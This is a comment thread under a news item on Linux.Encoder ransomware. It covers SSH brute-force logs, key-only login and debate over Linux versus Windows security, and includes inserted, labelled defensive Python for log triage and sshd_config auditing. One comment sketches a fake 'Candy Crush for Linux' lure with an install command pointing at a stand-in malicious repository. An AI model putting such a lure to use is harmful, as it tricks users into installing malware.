Can't get a break: Pwned Linux ransomware pwned again, infects 3000

Pwned ransomware Linux Encoder has infected 3000 machines in a month, Russian security firm Dr Web says, despite the fact both versions of the software have been neutered. The first version of the ransomware was decrypted by security boffins at BitDefender days after it was first revealed by Dr Web. Linux.Encoder.1 encrypts …

  1. SecretSonOfHG

    Does it infect Linux desktops?

    Or are we, the six of us, still safe? Seriously, one of the advantages of running a Linux desktop has always been that malware writers don't care about us. Security by minority has worked great for me in the last decade or so.

    1. Chemist

      Re: Does it infect Linux desktops?

      Suggested reading:

      "https://en.wikipedia.org/wiki/Linux_malware"

      I know you are joking about "the six of us" as there are tens of millions of desktop Linux users. The infection vector is content management systems that have been fixed already. So unless you are running such unpatched and exposing the same to the internet, it seems very unlikely that you will have to face such a problem.

      I've been running SSHD for >10 years and in all that time only one attempt has attacked the (non-standard) port, without success, I add. But that is the only internet-exposed port I have. Indeed I have all lower ports blocked at several points: my ISP, router and firewalls. If you expose ports to the internet you need to be responsible enough to maintain configs/software/logs as well as the usual care with installation sources, permissions, e-mails etc. I usually browse in a VM as well.

      1. Anonymous Coward

        Re: Does it infect Linux desktops?

        Downvoted 10 of millions...

        1. Chemist

          Re: Does it infect Linux desktops?

          "Downvoted 10 of millions..."

          Say 1.5 billion desktops at 1.5% Linux - that's >20 million

        2. Anonymous Coward

          Re: Does it infect Linux desktops?

          Downvoted 10 of millions...

          https://www.linuxcounter.net/statistics/users

      2. Anonymous Coward

        @chemist - only ONE attempt to attack SSHD?

        I get them all the time and just ignore them. Though I'm running on the standard port 22, I tried moving it for a time and found it didn't stop the attacks for long; I guess they found it via port scanning. Here's what I've had in just the past hour:

        Dec 1 12:53:48 REDACTED sshd[610]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:03:48 REDACTED sshd[738]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:13:48 REDACTED sshd[872]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:16:13 REDACTED sshd[882]: Did not receive identification string from 117.4.112.87

        Dec 1 13:16:14 REDACTED sshd[883]: Address 117.4.112.87 maps to localhost, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!

        Dec 1 13:16:14 REDACTED sshd[883]: Invalid user support from 117.4.112.87

        Dec 1 13:16:14 REDACTED sshd[883]: input_userauth_request: invalid user support [preauth]

        Dec 1 13:16:15 REDACTED sshd[883]: pam_unix(sshd:auth): check pass; user unknown

        Dec 1 13:16:15 REDACTED sshd[883]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.4.112.87

        Dec 1 13:16:17 REDACTED sshd[883]: Failed password for invalid user support from 117.4.112.87 port 51949 ssh2

        Dec 1 13:16:18 REDACTED sshd[883]: Received disconnect from 117.4.112.87: 3: com.jcraft.jsch.JSchException: Auth fail [preauth]

        Dec 1 13:23:48 REDACTED sshd[910]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:33:47 REDACTED sshd[1225]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:43:48 REDACTED sshd[1346]: Connection closed by 75.167.206.109 [preauth]

        Dec 1 13:47:33 REDACTED sshd[1354]: Did not receive identification string from 212.83.161.12

        Dec 1 13:47:34 REDACTED sshd[1355]: Invalid user support from 212.83.161.12

        Dec 1 13:47:34 REDACTED sshd[1355]: input_userauth_request: invalid user support [preauth]

        Dec 1 13:47:34 REDACTED sshd[1355]: pam_unix(sshd:auth): check pass; user unknown

        Dec 1 13:47:34 REDACTED sshd[1355]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=212-83-161-12.rev.nameserverdot.com

        Dec 1 13:47:36 REDACTED sshd[1355]: Failed password for invalid user support from 212.83.161.12 port 56924 ssh2

        Dec 1 13:47:37 REDACTED sshd[1355]: Received disconnect from 212.83.161.12: 3: com.jcraft.jsch.JSchException: Auth fail [preauth]
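Added example, not from the thread: a small Python triage of sshd lines like the ones posted above, grouping events by source address and separating hosts that actually tried a username and password from hosts that only connected and dropped before authentication (the `[preauth]` closes, which look like scanning). The sample lines are excerpted from the log in the comment; the event names, the threshold and the verdict labels are my own assumptions.

```python
import re
from collections import defaultdict

# Sample sshd lines, excerpted from the log posted in the comment above.
SAMPLE_LOG = """\
Dec 1 12:53:48 REDACTED sshd[610]: Connection closed by 75.167.206.109 [preauth]
Dec 1 13:03:48 REDACTED sshd[738]: Connection closed by 75.167.206.109 [preauth]
Dec 1 13:13:48 REDACTED sshd[872]: Connection closed by 75.167.206.109 [preauth]
Dec 1 13:16:13 REDACTED sshd[882]: Did not receive identification string from 117.4.112.87
Dec 1 13:16:14 REDACTED sshd[883]: Invalid user support from 117.4.112.87
Dec 1 13:16:17 REDACTED sshd[883]: Failed password for invalid user support from 117.4.112.87 port 51949 ssh2
Dec 1 13:47:34 REDACTED sshd[1355]: Invalid user support from 212.83.161.12
Dec 1 13:47:36 REDACTED sshd[1355]: Failed password for invalid user support from 212.83.161.12 port 56924 ssh2
"""

# One regex per event kind; the source address is always the last capture group.
PATTERNS = {
    "preauth_close": re.compile(r"Connection closed by (\S+) \[preauth\]"),
    "no_ident": re.compile(r"Did not receive identification string from (\S+)"),
    "invalid_user": re.compile(r"Invalid user (\S+) from (\S+)"),
    "failed_password": re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port"),
}

def summarise(log_text):
    """Group events by source address: {ip: {"events": {kind: n}, "users": set}}."""
    per_ip = defaultdict(lambda: {"events": defaultdict(int), "users": set()})
    for line in log_text.splitlines():
        for kind, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                ip = m.group(m.lastindex)
                per_ip[ip]["events"][kind] += 1
                if kind in ("invalid_user", "failed_password"):
                    per_ip[ip]["users"].add(m.group(1))   # username that was tried
                break
    return per_ip

def classify(per_ip, scan_threshold=3):
    """'brute_force' if a login was attempted, 'scanner' if the host only connected
    and dropped repeatedly (banner grabbing), otherwise 'noise'."""
    verdicts = {}
    for ip, info in per_ip.items():
        ev = info["events"]
        if ev["failed_password"] or ev["invalid_user"]:
            verdicts[ip] = "brute_force"
        elif ev["preauth_close"] + ev["no_ident"] >= scan_threshold:
            verdicts[ip] = "scanner"
        else:
            verdicts[ip] = "noise"
    return verdicts
```

Feeding a real /var/log/auth.log through `summarise` gives a per-source view that a fail2ban-style rule can act on; the `users` set is the quickest way to see whether the attempts target accounts that actually exist on the box.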

        1. Chemist

          Re: @chemist - only ONE attempt to attack SSHD?

          "I get them all the time, just ignore them"

          Staggering, isn't it. I have, as I say, just had the one on the non-standard port. I get attempts against the usual suspects all the time, but no other ports are open. I do other things when I'm being paranoid, like limiting the time the port is open to a small time window every day. But I do use it for real all the time when travelling.

          1. depicus

            Re: @chemist - only ONE attempt to attack SSHD?

            Turning off passwords and using a cert login helps.

        2. Vic

          Re: @chemist - only ONE attempt to attack SSHD?

          Here's what I've had in just the past hour

          I also run sshd on port 22 - and I've had rather more attacks than you, so I won't bother pasting the log here.

          But the daemon I run that is visible externally doesn't accept password logins at all. So no-one is getting in without the key...

          Vic.
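Added example, not from the thread: a Python audit of an sshd_config text for the settings that decide whether an internet-facing daemon accepts passwords at all, as the two comments above recommend. It follows the OpenSSH rule that, outside Match blocks, the first value given for a keyword wins, so a "PasswordAuthentication no" appended below an earlier "yes" is silently ignored. The defaults table (OpenSSH 7.0 and later) and both sample configs are my assumptions.

```python
# Assumed OpenSSH defaults used when a keyword is absent (OpenSSH 7.0 and later).
DEFAULTS = {"passwordauthentication": "yes",
            "pubkeyauthentication": "yes",
            "permitrootlogin": "prohibit-password"}

# Values acceptable for an internet-facing daemon (key-only login).
WANTED = {"passwordauthentication": {"no"},
          "pubkeyauthentication": {"yes"},
          "permitrootlogin": {"no", "prohibit-password"}}

def effective_settings(config_text):
    """Resolve the global section the way sshd does: keywords are case-insensitive,
    the first value per keyword wins, and every line after a Match is conditional."""
    settings = {}
    in_match = False
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)   # "Key value" or "Key=value"
        key = parts[0].lower()
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":
            in_match = True                            # rest of file is conditional
            continue
        if not in_match:
            settings.setdefault(key, value)            # later duplicates are ignored
    return settings

def audit(config_text):
    """Return {keyword: (effective_value, ok)} for the audited keywords."""
    eff = effective_settings(config_text)
    return {k: (eff.get(k, DEFAULTS[k]), eff.get(k, DEFAULTS[k]) in WANTED[k])
            for k in WANTED}

# Constructed sample configs for the demo.
WEAK = """\
Port 22
PasswordAuthentication yes
# appended later, assuming it overrides the line above (it does not):
PasswordAuthentication no
"""

HARDENED = """\
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
PermitRootLogin no
Match Address 192.168.1.0/24
    PasswordAuthentication yes   # LAN-only exception, not global policy
"""
```

Running `sshd -T` on the host prints the resolved values directly; this audit is useful when you only have the file, for example when reviewing a config in version control.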

          1. Anonymous Coward

            Re: @chemist - only ONE attempt to attack SSHD?

            The times when I need to get in via SSH are when I'm doing something like helping my parents out with their PC and need to look up something on my home computer. I can ssh via my phone, but it is such a pain trying to type Unix CLI commands on a phone it just isn't worth the hassle.

            So yeah, I have a password login exposed to the internet, but if they can somehow get hold of my password they deserve to get in... not like I keep state secrets on my desktop computer - I'd probably be more concerned with someone getting hold of what's on my phone.

            1. Chemist

              Re: @chemist - only ONE attempt to attack SSHD?

              "and need to look up something on my home computer. I can ssh via my phone"

              Well I don't know what phone you are using but I generally access files from home using a file manager via fish protocol. My home file system is just another folder in my file manager.

              https://en.wikipedia.org/wiki/Files_transferred_over_shell_protocol

    2. Anonymous Coward

      Re: Does it infect Linux desktops?

      Security by minority

      Sure, for desktops.

      Although the majority of servers are Linux, and have been the target of attack since day one.

      I think the low number of Linux infections (as a per-OS percentage) is due mainly to the mindset. Downloading random executables from an untrusted (not to mention non-SSL) source just isn't done. Not just for the sake of security, but because that's the way it's done.

      Add this to the fact that most desktops don't connect directly to the internet (and therefore aren't subject to the same type of attacks servers are), and the chance of being infected is very slim.

      It has little to do with how many users or vulnerabilities the OS has.

      It's the same with mobiles/tablets (even Windows), provided you keep "untrusted sources" off.

      1. The Original Steve

        Re: Does it infect Linux desktops?

        Since MS cleaned up its act in the last 5-10 years, Windows and other MS software's weakest area has been the fleshy bit IMHO.

        Far from perfect, but best practice and knowledge of what you're doing makes most mainstream platforms pretty secure by default these days.

      2. Anonymous Coward

        Re: Does it infect Linux desktops?

        "Although the majority of servers are Linux, and has been the target of attack since day one."

        Yep - and allowing for market share - if you look at say website defacement stats - Linux boxes are approx. 4 times more likely to be successfully hacked than Internet-facing Windows server-based systems. Linux based systems have at least over most of the past decade had far more vulnerabilities that on average take longer to get patches released once publicly known (more days at risk).

        "I think the low number of Linux infections (as a per-OS percentage) is due mainly to the mindset."

        Linux is the highest percentage versus other OSs when you look at servers (even adjusting for market share).

        "most desktops don't connect directly to the internet "

        Not true. Most do - or at least have access. The primary vulnerability issue for desktops is user interaction.

        "It has little to do with how many users or vulnerabilities the OS has."

        Disagree entirely.

        1. SecretSonOfHG

          Re: Does it infect Linux desktops?

          <<Linux based systems have at least over most of the past decade had far more vulnerabilities that on average take longer to get patches released once publicly known (more days at risk).>>

          Source?

          1. Anonymous Coward

            Re: Does it infect Linux desktops?

            Told by Microsoft PR, so it must be the truth 'cause they're good at it.

          2. David Pearce

            Re: Does it infect Linux desktops?

            Could actually be true if you count all of the home routers running Linux, with hard coded root passwords and a total lack of patching.

            1. Richard Plinston

              Re: Does it infect Linux desktops?

              > home routers running Linux, with hard coded root passwords

              Routers are typically configured by default with no ports open on the internet facing side. They will only allow access from _inside_ the local network. That is true whichever OS is being used in the router and regardless of what desktop OSes are in the network.

        2. Anonymous Coward

          Re: Does it infect Linux desktops?

          "most desktops don't connect directly to the internet "

          Not true. Most do - or at least have access

          I said directly. Most desktops connect through some sort of a router. If you were to port scan my public IP address, you'll be scanning my router - not my desktop. Therefore, the types of attacks that servers are susceptible to aren't relevant to desktops, on the whole.

          The primary vulnerability issue for desktops is user interaction.

          Like I said, hence:

          "It has little to do with how many users or vulnerabilities the OS has."

        3. Richard Plinston

          Re: Does it infect Linux desktops?

          > on average take longer to get patches released once publically known (more days at risk).

          That is because Microsoft does not make public the issue until the patches are released. This does not change the 'days at risk' as you claim because it is not the 'public' that create the risk. The risk occurs from the time that black hats create it, not when the public is told of it.

      3. Crazy Operations Guy

        Re: "Downloading a random executables from an untrusted ... source just isn't done."

        I'd agree when it comes to power-users and other folk who understand what is happening behind the scenes, but as the great unwashed start using it, that'll change fairly quickly.

        More and more, I see newbies pop up on forums asking about a specific piece of software or hardware working and then get directed to install a package off a personal or obscure repository. I don't think it'd be too long (if it hasn't happened already) before someone posts a link to a repository hosting compromised software.

        I figure that you could probably get a lot of people to install your malware if you advertise it as something like "Candy Crush for Linux! Just run 'doas apt-get http://malicious.domain.ru/repos/...'. ignore the encryption error since this is my personal repository and I just finished this". Hell, they could cover their tracks by just bundling in an Android Emulator so it works, but does nasty things in the background.

        But what worries me the most is the proliferation of systemd and the philosophy that goes with it ('Don't worry, the OS will take care of it, nothing for you to see here, just an obfuscated database and API'); it's big and bloated enough that there are many, many little spots to hide malware and other assorted nasties, although one might argue that systemd is, in itself, a piece of malware...

      4. Richard Plinston

        Re: Does it infect Linux desktops?

        > Downloading random executables from an untrusted (not to mention non-SSL) source just isn't done.

        Not only that, but on Linux a downloaded file is _not_ executable no matter what its filename is; it requires specific user action (eg running chmod) before it can become executable. Also, Linux mail programs do not automatically execute attachments, which is another vector on another OS.

        1. Vic

          Re: Does it infect Linux desktops?

          Not only that, but on Linux a downloaded file is _not_ executable no matter what its filename is; it requires specific user action (eg running chmod) before it can become executable.

          Whilst you're absolutely right, don't underestimate the willingness of users to believe everything they read on Internet fora.

          I used to have regular set-tos with a customer who insisted I chmod everything on his server to 777. He'd read somewhere that that would make things work better. I insisted on having that sort of thing in writing before even considering it...

          Vic.

  2. Mystic Megabyte
    Unhappy

    Reader's digest

    Over on Ars it seems that the Reader's Digest site is dishing out CryptoWall 3.0

    http://arstechnica.co.uk/security/2015/12/hey-readers-digest-your-site-has-been-attacking-visitors-for-days/

    1. waldo kitty
      Boffin

      Re: Reader's digest

      Over on Ars it seems that the Reader's Digest site is dishing out CryptoWall 3.0

      I saw this reported several days ago... not sure who reported it but it was one of the security groups... maybe "Naked Security" or "Packet Storm" or similar...

  3. phil dude
    Joke

    Paranoia is good....

    It's why we block ads after all....

    P.
